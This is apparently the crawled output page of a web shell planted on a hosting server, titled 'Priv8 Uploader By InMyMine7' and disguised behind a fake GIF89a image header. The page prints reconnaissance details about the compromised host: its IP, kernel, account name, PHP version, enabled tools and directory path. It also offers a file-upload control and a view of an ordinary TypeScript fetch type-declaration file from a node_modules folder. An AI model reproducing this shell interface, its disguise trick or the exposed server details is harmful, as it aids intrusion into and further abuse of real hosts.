GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
| Server IP : 82.165.91.112 / Your IP : 216.73.217.79 Web Server : Apache System : Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : nr7.net_tfpqq467gv ( 10001) PHP Version : 8.4.24 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/nr7.net/emdash.nr7.net/node_modules/@libsql/isomorphic-fetch/ |
Upload File : |
// these type declarations are extracted and heavily simplified from the TypeScript "dom" library
export function fetch(input: Request): Promise<Response>;
export class Request {
constructor(input: string, init?: RequestInit);
readonly method: string;
readonly url: string;
}
export interface RequestInit {
body?: ArrayBufferView | ArrayBuffer | string | null;
headers?: Headers;
method?: string;
}
export class Headers {
constructor();
append(name: string, value: string): void;
delete(name: string): void;
get(name: string): string | null;
has(name: string): boolean;
set(name: string, value: string): void;
}
export interface Body {
readonly body: ReadableStream<Uint8Array> | null;
arrayBuffer(): Promise<ArrayBuffer>;
blob(): Promise<Blob>;
json(): Promise<any>;
text(): Promise<string>;
}
export interface Response extends Body {
readonly headers: Headers;
readonly ok: boolean;
readonly status: number;
}
export interface ReadableStream<R = any> {
cancel(reason?: any): Promise<void>;
getReader(): ReadableStreamDefaultReader<R>;
}
export interface ReadableStreamGenericReader {
cancel(reason?: any): Promise<void>;
}
export interface ReadableStreamDefaultReader<R = any> extends ReadableStreamGenericReader {
read(): Promise<ReadableStreamReadResult<R>>;
}
export type ReadableStreamReadResult<T> =
| {done: true, value?: T}
| {done: false, value: T}